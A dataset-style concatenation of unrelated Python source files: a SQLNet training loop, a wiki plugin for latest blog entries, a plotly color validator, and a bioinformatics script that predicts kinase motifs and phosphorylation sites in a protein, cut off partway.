parser.add_argument('--epoch', type=int, default=100, help='Epoch number')
parser.add_argument('--gpu', action='store_true', help='Whether use gpu to train')
parser.add_argument('--toy', action='store_true', help='If set, use small data for fast debugging')
parser.add_argument('--ca', action='store_true', help='Whether use column attention')
parser.add_argument('--train_emb', action='store_true', help='Train word embedding for SQLNet')
parser.add_argument('--restore', action='store_true', help='Whether restore trained model')
parser.add_argument('--logdir', type=str, default='', help='Path of save experiment log')
args = parser.parse_args()
n_word=300
if args.toy:
use_small=True
gpu=args.gpu
batch_size=16
else:
use_small=False
gpu=args.gpu
batch_size=args.bs
learning_rate = 1e-3
# load dataset
train_sql, train_table, train_db, dev_sql, dev_table, dev_db = load_dataset(use_small=use_small)
word_emb = load_word_emb('data/char_embedding')
model = SQLNet(word_emb, N_word=n_word, use_ca=args.ca, gpu=gpu, trainable_emb=args.train_emb)
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate, weight_decay=0)
if args.restore:
model_path= 'saved_model/best_model'
print "Loading trained model from %s" % model_path
model.load_state_dict(torch.load(model_path))
# used to record best score of each sub-task
best_sn, best_sc, best_sa, best_wn, best_wc, best_wo, best_wv, best_wr = 0, 0, 0, 0, 0, 0, 0, 0
best_sn_idx, best_sc_idx, best_sa_idx, best_wn_idx, best_wc_idx, best_wo_idx, best_wv_idx, best_wr_idx = 0, 0, 0, 0, 0, 0, 0, 0
best_lf, best_lf_idx = 0.0, 0
best_ex, best_ex_idx = 0.0, 0
print "#"*20+" Star to Train " + "#"*20
for i in range(args.epoch):
print 'Epoch %d'%(i+1)
# train on the train dataset
train_loss = epoch_train(model, optimizer, batch_size, train_sql, train_table)
# evaluate on the dev dataset
dev_acc = epoch_acc(model, batch_size, dev_sql, dev_table, dev_db)
# accuracy of each sub-task
print 'Sel-Num: %.3f, Sel-Col: %.3f, Sel-Agg: %.3f, W-Num: %.3f, W-Col: %.3f, W-Op: %.3f, W-Val: %.3f, W-Rel: %.3f'%(
dev_acc[0][0], dev_acc[0][1], dev_acc[0][2], dev_acc[0][3], dev_acc[0][4], dev_acc[0][5], dev_acc[0][6], dev_acc[0][7])
# save the best model
if dev_acc[1] > best_lf:
best_lf = dev_acc[1]
best_lf_idx = i + 1
torch.save(model.state_dict(), 'saved_model/best_model')
if dev_acc[2] > best_ex:
best_ex = dev_acc[2]
best_ex_idx = i + 1
# record the best score of each sub-task
if True:
if dev_acc[0][0] > best_sn:
best_sn = dev_acc[0][0]
best_sn_idx = i+1
if dev_acc[0][1] > best_sc:
best_sc = dev_acc[0][1]
best_sc_idx = i+1
if dev_acc[0][2] > best_sa:
best_sa = dev_acc[0][2]
best_sa_idx = i+1
if dev_acc[0][3] > best_wn:
best_wn = dev_acc[0][3]
best_wn_idx = i+1
if dev_acc[0][4] > best_wc:
best_wc = dev_acc[0][4]
best_wc_idx = i+1
if dev_acc[0][5] > best_wo:
best_wo = dev_acc[0][5]
best_wo_idx = i+1
if dev_acc[0][6] > best_wv:
best_wv = dev_acc[0][6]
best_wv_idx = i+1
if dev_acc[0][7] > best_wr:
best_wr = dev_acc[0][7]
best_wr_idx = i+1
print 'Train loss = %.3f' % train_loss
print 'Dev Logic Form Accuracy: %.3f, Execution Accuracy: %.3f' % (dev_acc[1], dev_acc[2])
print 'Best Logic Form: %.3f at epoch %d' % (best_lf, best_lf_idx)
print 'Best Execution: %.3f at epoch %d' % (best_ex, best_ex_idx)
if (i+1) % 10 == 0:
print 'Best val acc: %s\nOn epoch individually %s'%(
(best_sn, best_sc, best_sa, best_wn, best_wc, best_wo, best_wv),
(best_sn_idx, best_sc_idx, best_sa_idx, best_wn_idx, best_wc_idx, best_wo_idx, best_wv_idx))
| 44.693069 | 131 | 0.594152 |
74c6376ab1efa2f796963d42c0533079f995bf8b | 3,989 | py | Python | lib/yaki/plugins/_legacy/LatestEntries.py | rcarmo/yaki-tng | 9f1094bc8e359be881fb5ca19042f352b8c8d8a1 | [
"MIT"
] | 2 | 2015-12-21T02:24:13.000Z | 2016-03-08T06:45:58.000Z | lib/yaki/plugins/_legacy/LatestEntries.py | rcarmo/yaki-tng | 9f1094bc8e359be881fb5ca19042f352b8c8d8a1 | [
"MIT"
] | null | null | null | lib/yaki/plugins/_legacy/LatestEntries.py | rcarmo/yaki-tng | 9f1094bc8e359be881fb5ca19042f352b8c8d8a1 | [
"MIT"
] | 1 | 2015-07-19T22:10:51.000Z | 2015-07-19T22:10:51.000Z | #!/usr/bin/env python
# encoding: utf-8
"""
LatestEntries.py
Created by Rui Carmo on 2011-09-02.
Published under the MIT license.
"""
import re, md5, urlparse, time, cgi, traceback
import yaki.Engine, yaki.Store, yaki.Locale
from yaki.Utils import *
from yaki.Layout import *
from BeautifulSoup import *
class LatestBlogEntriesWikiPlugin(yaki.Plugins.WikiPlugin):
def __init__(self, registry, webapp):
registry.register('markup',self, 'plugin','LatestEntries')
self.webapp = webapp
self.ac = webapp.getContext()
self.i18n = yaki.Locale.i18n[self.ac.locale]
def run(self, serial, tag, tagname, pagename, soup, request, response):
ac = self.ac
c = request.getContext()
# define how many blog entries to show
try:
bound = int(tag['size'])
except:
bound = 3
# filter for the namespace we want
# TODO: this should be extensible to tags sometime in the future
try:
mask = re.compile(tag['src'])
except:
mask = re.compile('^(blog)\/(\d+){4}\/(\d+){2}\/(\d+){2}.*')
# this is what entries ought to look like, ideally
canon = "0000/00/00/0000"
# find entries.
# We use the indexer's allpages here because that's updated upon server start
# ...and because we want to do our own sorting anyway.
paths = [path for path in self.ac.indexer.allpages if mask.match(path)]
# canonize paths
entries = {}
for i in paths:
(prefix, path) = i.split("/",1)
l = len(path)
p = len(prefix)+1
k = len(canon)
# add an hex digest in case there are multiple entries at the same time
if l < k:
entries[i[p:l+p] + canon[-(k-l):] + md5.new(i).hexdigest()] = i
else:
entries[i[p:] + md5.new(i).hexdigest()] = i
latest = entries.keys()
latest.sort()
latest.reverse()
# skip over the latest entry
latest = latest[1:bound+1]
posts = []
for i in latest:
name = entries[i]
try:
page = ac.store.getRevision(name)
except IOError:
print "LatestBlogEntries: could not retrieve %s" % name
continue
headers = page.headers
path = ac.base + name
linkclass = "wikilink"
posttitle = headers['title']
rellink = path
permalink = headers['bookmark'] = request.getBaseURL() + rellink
if SANITIZE_TITLE_REGEX.match(name):
permalink = permalink + "#%s" % sanitizeTitle(posttitle)
description = "permanent link to this entry"
if 'x-link' in headers.keys():
link = uri = headers['x-link']
(schema,netloc,path,parameters,query,fragment) = urlparse.urlparse(uri)
if schema in self.i18n['uri_schemas'].keys():
linkclass = self.i18n['uri_schemas'][schema]['class']
description = "external link to %s" % cgi.escape(uri)
content = yaki.Engine.renderPage(self.ac,page)
try:
soup = BeautifulSoup(content)
# remove all funky markup
for unwanted in ['img','plugin','div','pre']:
[i.extract() for i in soup.findAll(unwanted)]
paragraphs = filter(lambda p: p.contents, soup.findAll('p'))
soup = paragraphs[0]
content = soup.renderContents().decode('utf-8')
# TODO: impose bound checks here and insert ellipsis if appropriate.
# the "Read More" links are added in the template below.
except Exception, e:
print "DEBUG: failed to trim content to first paragraph for entry %s, %s" % (name, e)
continue
postinfo = renderInfo(self.i18n,headers)
metadata = renderEntryMetaData(self.i18n,headers)
# Generate c.comments
formatComments(ac,request,name, True)
comments = c.comments
try:
tags = headers['tags']
except:
tags = ""
references = ''
posts.append(ac.templates['latest-entries'] % locals())
tag.replaceWith(''.join(posts))
| 34.991228 | 93 | 0.608172 |
a56faa1f02aed277b6d1fc63843fccca9476d17c | 454 | py | Python | plotly/validators/layout/polar/radialaxis/tickfont/_color.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | 2 | 2020-03-24T11:41:14.000Z | 2021-01-14T07:59:43.000Z | plotly/validators/layout/polar/radialaxis/tickfont/_color.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | null | null | null | plotly/validators/layout/polar/radialaxis/tickfont/_color.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | 4 | 2019-06-03T14:49:12.000Z | 2022-01-06T01:05:12.000Z | import _plotly_utils.basevalidators
class ColorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self,
plotly_name='color',
parent_name='layout.polar.radialaxis.tickfont',
**kwargs
):
super(ColorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='plot',
role='style',
**kwargs
)
| 23.894737 | 66 | 0.601322 |
40553a4390bc75b65582cc185c3ad91a886bbff8 | 55,994 | py | Python | Modified-PhosphoKin-LAMC1.py | AngelikiGal/Modified-PhosphoKin | f8f2b6f8f467a9f59cee43dac96ebd5198f2dc57 | [
"BSD-2-Clause"
] | 1 | 2020-10-07T14:21:11.000Z | 2020-10-07T14:21:11.000Z | Modified-PhosphoKin-LAMC1.py | AngelikiGal/Modified-PhosphoKin | f8f2b6f8f467a9f59cee43dac96ebd5198f2dc57 | [
"BSD-2-Clause"
] | null | null | null | Modified-PhosphoKin-LAMC1.py | AngelikiGal/Modified-PhosphoKin | f8f2b6f8f467a9f59cee43dac96ebd5198f2dc57 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
# 1st Function: Tool for searching kinase binding sites and potential phosphorylated residues in a protein.
# 2nd Funtion: This scripts also categorizes the phosphorylated residues according to their location relatively to the proteins' known active sites (inside of, close to within six residues proximity and outside of active sites).
# 3rd Function: This script also links kinases to active sites according to the phosphorylated residues they are responsible for and shows their activity inside of, close to and outside of active sites.
# 4th Function: This script finds the possibly responsible kinases for the experimentally observed phosphorylated residues in a protein according to kinases' binding motifs.
# 5th Function: This script identifies the missense point mutations that have been found in cancer patients and possibly disturb the predicted phosphorylation of the protein by either not allowing kinase binding or the phosphorylation according to kinases' motifs.
# Author: Panagiota-Aggeliki Galliou * (ag.gal.work@gmail.com))
# Author: Kleio-Maria Verrou (kleioverrou@yahoo.com)
# * to whom correspondance should be addressed.
## Copyright: © Copyright 2018+, Panagiota-Aggeliki Galliou, All rights reserved.
##License: This script follows the BSD License.
### Note: the kinase motifs are traslated to regular expressions
#### Input: a Sequence.txt file, an Active_sites.txt, an exp_phospho.txt file, a Motifs.txt file and a Mutation.xlxs file.
#### OUTPUT: Five output files; one for the 1st function (.txt file), one for the 2nd function (.txt file), one for the 3rd function (.txt file), one for the 4th function (.txt file) and one for the 5th function (.xls file).
# Edit: 29/6/2019 by Panagiota-Aggeliki Galliou (ag.gal.work@gmail.com)
## changes: -included important residues for kinases motifs, -included recognizing missense point mutations from a file and matching them to the proteins' active sites, kinases' binding sites and phosphorylations, identifying those mutations that possibly disturb the phoshporylation of the protein according to kinases' motifs either by changing an important residue for kinase binding or by changing the residue to be phosphorylated.
# Edit: 10/7/2019 by Panagiota-Aggeliki Galliou (ag.gal.work@gmail.com)
## changes: -included the Tyrosine Kinases and Tyrosines phosphorylated residues. So the find_phospho_indexes_in_a_motif(motif) function was changed to identify pY as phosphorylated residues in order to recognise the motifs of Tyrosine Kinases.
# Last Edit: 08/01/2020 by Panagiota-Aggeliki Galliou (ag.gal.work@gmail.com)
## changes: -changed the comments and the prints to contain more details and to be more specific,
"""
import re
import time
import sys
import os
import xlrd
import xlwt
import xlsxwriter
# ~ classes ~ #
## ~ ~ for input entries ~ ~ ##
class protein:
def __init__(self):
self.name = "" #name of the protein
self.type = "" #Kinase
self.motifs = [] # list of motifs the protein has. it takes motif objects
class motif:
def __init__(self):
self.regex = "" #regular expression of the motif
self.pr=[] #it's an array. it holds numbers that show from the beginning of the motif in how many residues the kinase will phosphorylate. E.g +0 means the kinase will phosphorylate the first recognized residue in the motif. +1 the second secognized residue from the start of the motif etc. So, the motif is [E/D]..pS the value would be +3.
self.ir=[] #it's an array. it holds numbers that show the important residues in the motif (the residues that are required in the protein sequence for the kinase to bind and phosphorylate there. so basically, anything that is not an X (any aminoacid)). The important residues are presented with numbers, which show from the beggining of the motif (indexed as 0) the position of the important residue. So in a motif XXApS the values would be +3,+4.
## ~ ~ for result entries ~ ~ ##
class slim:
def __init__(self):
self.start = -1
self.end = -1
self.sequence = -1
self.phospho_res=[] #each element of the array shows the position of the residue that will be phosphorylated according to the motif
self.important_res=[] #the element of the array shows the position of each important residue according to the motif
class result_motif:
def __init__(self):
self.regex = ""
self.Slims = [] # the slims found for this motif. It takes slim objects.
self.M_slims=0 #counts the slims found for this motif. It is the len(Slims). The 0 value it has by default means that the Slims array is empty.
self.M_p_residues=[] #it has all the phosphorylated residues for this motif.
self.M_i_residues=[] #it has all the important residues for this motif.
class result_protein:
def __init__(self):
self.name = ""
self.type="" #Kinase
self.Motifs = []
self.total_slims= 0 #counts all the slims found for a kinase.
self.total_p_residues=[] #has all the phosphorylated residues for this kinase.
self.p_residues_inside=[] #has the residues in total_p_residues that are inside of active sites
self.p_residues_close=[] #has the residues in total_p_residues that are close within six residues proximity to active sites
self.p_residues_outside=[] #has the residues in total_p_residues that are outside of active sites
self.total_i_residues=[] #has all the importabt residues for this kinase.
self.i_residues_inside=[] #has the residues in total_i_residues that are inside of active sites
self.i_residues_close=[] #has the residues in total_i_residues that are close within six residues proximity to active sites
self.i_residues_outside=[] #has the residues in total_i_residues that are outside of active sites
class active_site:
def __init__(self):
self.start=0 #start of active site. Shows the position of the residue (eg 160).
self.end=0 #end of active site. Shows the position of the residue (eg 160).
class result_exp_phosph:
def __init__(self):
self.residue="" #is the residue that have been experimentally found to be phosphorylated
self.responsible_kinases=[] #The kinases that were predicted as possibly responsible for the phosphorylation of this residue. Takes result_kinase objects.
class AMutation():
def __init__(self, SampleID, CancerType, Mutation, FuncImpact, MutationType):
self.SampleID = SampleID
self.CancerType = CancerType
self.Mutation = Mutation
self.FuncImpact = FuncImpact
self.MutationType = MutationType
class result_mutation():
def __init__(self):
self.SampleID = ""
self.CancerType = ""
self.Mutation = ""
self.FuncImpact = ""
self.MutationType = ""
self.locationAS="" #location to active sites. Either inside, close or outside
self.AS = "" #which active site. In case the variable locationAS is inside or close this variable will have a value. in case lthe value of ocationAS is outside, the value of AS will be "-".
self.dPlaces=[] #a list holding all the motifs, slims, and kinases that this mutation disturbs.
class dPlace:
def __init__(self):
self.residue="" #either "phosphorylated residue" or "important residue" depending on whether the residue that the mutation distrubs is an important or a phosphorylated residue
self.kinase="" #the kinase that is disturbed by the mutation
# ~ END classes ~ #
# ~ functions ~ #
def get_sequence (filename):
## ~ ~ ~ Opens the Protein.txt file and gets protein sequence ~ ~ ~ ##
seq=""
protein_file= open(filename) # here you can put any protein sequence in fasta format
if protein_file:
print("Input file ",filename," opened.\n")
print("\n------------------------------------------------------------------\n")
for line in protein_file:
line=line.strip()
if ">" in line:
continue
else:
seq+=line
else:
raise IOError("Sequence file ",filename," could not open")
protein_file.close()
return seq
def get_exp_phosph_residues (filename):
exp_phosph=[] #an array to hold all the experimentally observed phosphorylations of the protein in a string format
string="" #buffer string
Exp_phosph_file= open(filename) # here you can put any txt file with the experimentally observed phosphorylation with a format: e.g. S13, T43, S145
if Exp_phosph_file:
print("Input file ",filename," opened.\n")
for line in Exp_phosph_file:
line=line.strip()
string+=line #get everything written in the file in a single string
else:
raise IOError("Sequence file ",filename," could not open")
Exp_phosph_file.close()
## edit the string to get the containing experimentally observed phosphorylated residues
buff=string.split(",")
## removing the whitespace characters from the start and end of the string and specifically the " " from the start of the string
for i in range(0,len(buff)):
buff[i]=buff[i].strip()
exp_phosph.append(buff[i])
return exp_phosph
def get_active_sites(filename):
active_sites=[] #an array to hold all the active_site objects
string="" #buffer string
AA_file= open(filename) # here you can put any txt file with the active sites of the protein with the following format: 15-22, 45-53, 63-74
if AA_file:
print("Input file ",filename," opened.\n")
for line in AA_file:
line=line.strip()
string+=line #get everything written in the file in a single string
else:
raise IOError("Sequence file ",filename," could not open")
AA_file.close()
## edit the string to get the containing active sites
buff=string.split(",")
## removing the whitespace characters from the start and end of the string and specifically the " " from the start of the string
for i in buff:
i=i.strip()
start,end=i.split("-")
active_sites.append(create_active_site(int(start),int(end)))
return active_sites
def get_motifs (filename):
kinases=[] #an array to hold all the protein objects
buff=[] #buffer contains in each position the motifs of each kinase
M_file= open(filename) # here you can put any txt file with the active sites of the protein with the following format: 15-22, 45-53, 63-74
if M_file:
print("Input file ",filename," opened.\n")
for line in M_file:
line=line.strip()
if (len(line)>0): #in case there are unnecessary new lines (enters) in the txt file
buff.append(line)
else:
raise IOError("Sequence file ",filename," could not open")
M_file.close()
## edit each element in the buffer to get the motifs of each kinase
for i in buff:
motifs=[] #an array to hold all the motif objects
protein, protein_motifs=i.split(":") #to split the protein name from the motifs of each kinase
protein=protein.strip()
protein=protein.split(" ")
if (len(protein)<1):
raise Exception("Protein name or protein type was not given correctly in ",i)
protein_name=protein[0].strip()
protein_type=protein[1].strip()
protein_motifs=protein_motifs.split("-") #to split the motifs of each kinase. protein_motifs acts as a buffer array that contains all the motifs of each kinase
for i in protein_motifs:
i=i.strip()
regex,pr,ir=find_phospho_indexes_in_a_motif(i)
motifs.append(create_motif(regex,pr,ir))
kinases.append(create_protein(protein_name,protein_type,motifs))
return kinases
def find_phospho_indexes_in_a_motif(motif):
#reads a motif and finds the residues to be phosphorylated. Also converts the motif into a regular expression.
nl = len(motif)
ir = [] #array that holds the positions for the residues indicated by the motif to be phosphorylated. # list of indexes of importand residues (including phospho..) in the motif
aS = [] #array that holds the possible residues for each position in the protein.
ni = -1 #shows the current aminoacid of the aS element
ii = 0 #shows the current character of the input string
pr = [] # list of indexes of phosphorylated residues in the motif
while ii < nl-1: #check the whole string until one character before the last character
c = motif[ii] #current character
cn = motif[ii+1] #next character
if (c == "["): #if "["
ts = c
c = cn
ii += 1
while c != "]": # [pS*/pT*] #scan the string until the "]"
ts += c # save the characters before "]" into the ts string
ii += 1
c = motif[ii]
ts += c #save the "]" into the string
aS.append(ts) #append it to the aS
if "*" in ts: #if "*" in the ts just move on
ni += 1
elif ("p" in ts): #if "p" in the ts it means the position will be phosphorylated so append to pr
ni += 1
pr.append(ni)
else:
ni+=1 #just move on
ir.append(ni)
# ni -= 1
elif (c == "p"): #if "p" search the next character
if cn in "STY": #if "S" or "T" or "Y"
ni += 1
ii += 1
ts = c+cn #save the characters into a ts sting
ir.append(ni) #keep it in importand residues
if (ii<nl-1) and (motif[ii+1]=="*"): #-- check if "*" which means that the residues should already be phosphoprylated for the kinase to bind, move on.
ts +="*"
ii +=1
else:
pr.append(ni) #If not "*" then its the residue to be phosphorylated so append in pr
aS.append(ts)
else: #else if not "[" or "p" then it is an amino acid
ni += 1
if not ('X' in c): # if it has a specific aminoacid then add it to ir
ir.append(ni)
aS.append(c) #just append to aS
ii += 1
if ii<nl: #check the last character of the string. this condition is true if the last character is "X" or an amino acid
c = motif[ii]
aS.append(c)
if not ('X' in c): # if it has a specific aminoacid then add it to ir
ni +=1
ir.append(ni)
#convert the array into a string for output and better handling
sret = ""
for ci in aS:
sret += ci
#replace certain characters of the string to convert the motif language into regular expressions.
sret = sret.replace("X", ".")
sret = sret.replace("/", ",")
sret = sret.replace("pS*", "S")
sret = sret.replace("pT*", "T")
sret = sret.replace("pY*", "Y")
sret = sret.replace("pS", "S")
sret = sret.replace("pT", "T")
sret = sret.replace("pY", "Y")
if len(pr) < 1:
raise Exception("A motif should show at least one residue to be phosphorylated.")
if len(ir) < 1:
raise Exception("A motif should show at least one important residue for binding.")
spr = []
for elem in pr:
spr.append(str(elem))
sir = []
for elem in ir:
sir.append(str(elem))
return sret, spr, sir
def create_motif(regex,pr,ir):
#creates a motif object with values the given arguments.
#the pi arguments are for the phospho_index value of the motif object and the ir arguments are for the important_res values of the motif object.
m=motif()
m.regex=regex
m.pr=pr
m.ir=ir
return m
def create_protein (name,the_type,motif_array):
#creates a protein objects with values the given arguments.
if (len(motif_array)>=1): # a protein must have at least one motif.
#create a protein element with a name, a type and the array with its motifs
p=protein()
p.name=name
p.type=the_type
p.motifs=motif_array
#return the protein element
else:
raise Exception("A protein should have at least one motif")
return p
def create_slim(seq,st,en,pr,ir):
#pi argument corresponds to phosphorylated index [counting from the beginning of the slim found].
#ir argument corresponds to the important index [counting fromt the beginning of the slim found].
s=slim()
s.sequence=seq #shows the sequence of the slim
s.start=st #shows the location of residue in the start of the slim (found by re.finditer())
s.end=en #shows the location of residue in the end of the slim (found by re.finditer())
for pi in pr:
if(is_correct(s,int(pi))):
s.phospho_res.append(s.start+int(pi))
for ii in ir:
if(is_correct(s,int(ii))):
s.important_res.append(s.start+int(ii))
return s
def is_correct(s, index):
#checks if the slim's residue that the index points to fall out of the slim's limits.
status=""
if (s.start<=s.start+index<=s.end):
status="TRUE"
else: #out of slim limits
status="FALSE"
print("Index ", index, "out of slim limits for ", s.sequence, "!")
return status
def create_result_motif(regex,array):
rm=result_motif()
rm.regex=regex
rm.Slims=array
rm.M_slims=len(rm.Slims)
for i in rm.Slims:
for a in i.phospho_res:
rm.M_p_residues.append(a)
for i in rm.Slims:
for b in i.important_res:
rm.M_i_residues.append(b)
return rm
def create_result_protein(protein, motif_array):
rp=result_protein()
rp.name=protein.name
rp.type=protein.type
rp.Motifs=motif_array
for i in rp.Motifs:
rp.total_slims=rp.total_slims+i.M_slims
for a in i.M_p_residues:
rp.total_p_residues.append(a)
for b in i.M_i_residues:
rp.total_i_residues.append(b)
#convert to set to keep only the unique entries and then to list again for easier manipulation.
rp.total_p_residues=set(rp.total_p_residues)
rp.total_p_residues=list(rp.total_p_residues)
#sorting the list
rp.total_p_residues.sort()
#convert to set to keep only the unique entries and then to list again for easier manipulation.
rp.total_i_residues=set(rp.total_i_residues)
rp.total_i_residues=list(rp.total_i_residues)
#sorting the list
rp.total_i_residues.sort()
#print(rp.total_i_residues)
return rp
def create_active_site(st,en):
aa=active_site()
aa.start=st
aa.end=en
return aa
def create_result_exp_phosph(residue,responsible_kinases):
rexp=result_exp_phosph()
rexp.residue=residue
rexp.responsible_kinases=responsible_kinases
return rexp
def create_AMutation(SampleID, CancerType, Mutation, FuncImpact, MutationType):
mutation_entry = AMutation(SampleID, CancerType, Mutation, FuncImpact, MutationType)
return mutation_entry
def create_result_mutation(SampleID, CancerType, Mutation, FuncImpact, MutationType, locationAS, AS, dPlaces):
rm = result_mutation()
rm.SampleID=SampleID
rm.CancerType=CancerType
rm.FuncImpact=FuncImpact
rm.MutationType=MutationType
rm.Mutation=Mutation
rm.locationAS=locationAS
rm.AS=AS
rm.dPlaces=dPlaces
return rm
def create_dPlace(kinase, residue):
dp=dPlace()
dp.kinase=kinase
dp.residue=residue
return dp
def find_motifs_for_a_kinase(protein,sequence):
#finds all the motifs for a protein in a sequence
slim_array=[] #all the slims found for a motif
motifs_array=[] #all the motifs found for a protein
for a in protein.motifs: #for each motif in this protein
slim_buffer=re.findall(a.regex, sequence) #find the regular expression in the given sequence.
slim_buffer=set(slim_buffer) #convert it to a set to keep only the unique entries
slim_buffer=list(slim_buffer) # convert it to a list for easier manipulation
for x in slim_buffer:
for m in (re.finditer(x,sequence)):
st=m.start()+1 #start of the slim. +1 because list start from 0 but residues from 1.
en=m.end()+0 #end if the slim.
new_slim=create_slim(x,st,en,a.pr,a.ir) #creates an new slim object
slim_array.append(new_slim)
slim_buffer=[] #clear slim_buffer
new_result_motif=create_result_motif(a.regex, slim_array)
motifs_array.append(new_result_motif)
slim_array=[] #clear slim_array
new_result_protein=create_result_protein(protein,motifs_array)
motifs_array=[] #clear motif_array
return new_result_protein
def find_motifs_for_all_proteins(proteins_array, sequence):
#finds all motifs of all proteins that are included in a protein_array in a sequence. Returns a Results array with all the results
Results=[] #has all the result_protein objects.
for i in proteins_array:
Results.append(find_motifs_for_a_kinase(i,sequence))
return Results
def merge_phospho_residues(Results) :
#merges the total_p_residues arrays of all result_protein objects that are included in the Results array on a single list. Returns that list.
All_phospho_residues=[]
for a in Results:
for b in a.total_p_residues:
All_phospho_residues.append(b)
#convert to set to keep only the unique entries and then to list for easier manipulation
All_phospho_residues=set(All_phospho_residues)
All_phospho_residues=list(All_phospho_residues)
All_phospho_residues.sort() #sorting
return All_phospho_residues
def merge_important_residues(Results) :
#merges the total_p_residues arrays of all result_protein objects that are included in the Results array on a single list. Returns that list.
All_important_residues=[]
for a in Results:
for b in a.total_i_residues:
All_important_residues.append(b)
#convert to set to keep only the unique entries and then to list for easier manipulation
All_important_residues=set(All_important_residues)
All_important_residues=list(All_important_residues)
All_important_residues.sort() #sorting
return All_important_residues
def assign_residues(array,sequence):
#get a array with the position of residues and returns an array with the residues and their position (e.g. S4)
return_array=[]
for i in range (0, len(array)):
index=array[i]
residue=sequence[index-1]
return_array.append(str(residue)+str(index))
return return_array
def de_assign_residues (array):
#separates the position from the residue. It takes an array with value eg S231 and return 231.
return_array=[]
for i in array:
return_array.append(int(i[1:]))
return return_array
def print_results(Results,protein_name,protein_sequence,inside,close,outside,Results_Exp_phosphp,Exp_Inside,Exp_Close,Exp_Outside):
# ~ ~ for the first output file ~ ~
outputname=protein_name+"-Kinases_Motifs.txt"
with open (outputname, "w") as output:
if output:
print("\nFile ",outputname, "created.\n")
underscore="_________________________________________________________________________________"
dashes="-------------------------------------------------------------"
All_phospho_residues=merge_phospho_residues(Results)
All_important_residues=merge_important_residues(Results)
All_phospho_residues_with_AA=assign_residues(All_phospho_residues,protein_sequence)
output.write("{:s}".format(underscore))
output.write("\nAll phosphorylated residues predicted for {:s}: (Total={:d})\n".format(protein_name,len(All_phospho_residues)))
output.write(str(All_phospho_residues))
#output.write("{:d}\n".format(All_phospho_residues))
output.write("\n{:s}\n".format("or (with assigned residues:)"))
for i in All_phospho_residues_with_AA:
output.write("{:s}, ".format(i))
output.write("\n{:s}\n".format(underscore))
output.write("{:s}".format(underscore))
output.write("\nAll Important residues for the predicted phosphorylation of {:s}: (Total={:d})\n".format(protein_name,len(All_important_residues)))
output.write(str(All_important_residues))
output.write("\n{:s}".format(underscore))
output.write("\nKinase's Binding Motifs in {:s}:\n".format(protein_name))
for a in Results:
motif_count=0
output.write("\n{:s}".format(dashes))
output.write("\n{:s} {:s} (Total motifs found={:d})\n".format(a.name,a.type, a.total_slims))
output.write("\n{:5s}{:s} (Total={:d})\n".format(" ","Phosphorylated Residues:",len(a.total_p_residues)))
ouf=" ["
for i in range(0,len(a.total_p_residues)):
ouf=ouf+str(a.total_p_residues[i])
if (i+1<len(a.total_p_residues)):
ouf=ouf+", "
ouf=ouf+"]"
output.write("{:5s}{:5s}\n".format(" ",ouf))
output.write("\n{:5s}{:s} (Total={:d})\n".format(" ","Important Residues:",len(a.total_i_residues)))
ouf=" ["
for i in range(0,len(a.total_i_residues)):
ouf=ouf+str(a.total_i_residues[i])
if (i+1<len(a.total_i_residues)):
ouf=ouf+", "
ouf=ouf+"]"
output.write("{:5s}{:5s}\n".format(" ",ouf))
output.write("\n\n{:5s} Motifs:\n".format(" "))
for b in a.Motifs:
output.write("\n{:8s}{:3d}) {:s} (Total={:d})\n".format(" ",motif_count+1,b.regex,b.M_slims))
motif_count=motif_count+1
slim_count=0
for c in b.Slims:
ouf1=""
for i in range(0,len(c.phospho_res)):
ouf1=ouf1+str(c.phospho_res[i])
if (i+1<len(c.phospho_res)):
ouf1=ouf1+", "
ouf2=""
for i in range(0,len(c.important_res)):
ouf2=ouf2+str(c.important_res[i])
if (i+1<len(c.important_res)):
ouf2=ouf2+", "
output.write("{:11s}{:3d}) {:5s} {:4d} - {:4d}: [Phosphorylated residue(s)= {:4s}] [Important residue(s)= {:4s}]\n".format(" ",slim_count+1,c.sequence,c.start,c.end,ouf1,ouf2))
slim_count=slim_count+1
output.write("\n{:13s}Motif's phosphorylated residues: (Total={:d})\n".format(" ",len(b.M_p_residues)))
ouf=" ["
for i in range(0,len(b.M_p_residues)):
ouf=ouf+str(b.M_p_residues[i])
if (i+1<len(b.M_p_residues)):
ouf=ouf+", "
ouf=ouf+"]"
output.write("{:13s}{:s}\n".format(" ",ouf))
output.write("\n{:13s}Motif's important residues: (Total={:d})\n".format(" ",len(b.M_i_residues)))
ouf=" ["
for i in range(0,len(b.M_i_residues)):
ouf=ouf+str(b.M_i_residues[i])
if (i+1<len(b.M_i_residues)):
ouf=ouf+", "
ouf=ouf+"]"
output.write("{:13s}{:s}\n".format(" ",ouf))
#motif_count=0 #set again in zero to count the next protein's motifs
output.write("{:s}\n".format(dashes))
print("Results written on ",outputname," file.")
else:
raise IOError("Output file ",outputname," not created")
output.close()
# ~ ~ for the second output file ~ ~
outputname=protein_name+"-Categorization_of_phosphorylations_comparatively_to_active_sites.txt"
with open (outputname, "w") as output:
if output:
print("\nFile ",outputname, "created.\n")
output.write("{:s}-Categorization of phosphorylated residues relatively to active sites \n(inside of, close to within six residues proximity and outside of active sites)\n".format(protein_name))
output.write("\n{:s}\n{:s}\n".format("Experimentally observed phosphorylated residues:",underscore))
output.write("Phosphorylated residues Inside Active sites: (Total={:d})\n".format(len(Exp_Inside)))
for i in Exp_Inside:
output.write("{:s}, ".format(i))
output.write("\n{:s}\n\nPhosphorylated residues Close within six residues proximity to Active sites: (Total={:d})\n".format(dashes,len(Exp_Close)))
for i in Exp_Close:
output.write("{:s}, ".format(i))
output.write("\n{:s}\n\nPhosphorylated residues Outside of Active sites: (Total={:d})\n".format(dashes,len(Exp_Outside)))
for i in Exp_Outside:
output.write("{:s}, ".format(i))
output.write("\n{:s}\n\n".format(underscore))
output.write("\n\n\n{:s}\n{:s}\n".format("Predicted observed phosphorylated residues:",underscore))
output.write("\nAll phosphorylated residues: (Total={:d})\n".format(len(All_phospho_residues)))
for i in All_phospho_residues_with_AA:
output.write("{:s}, ".format(i))
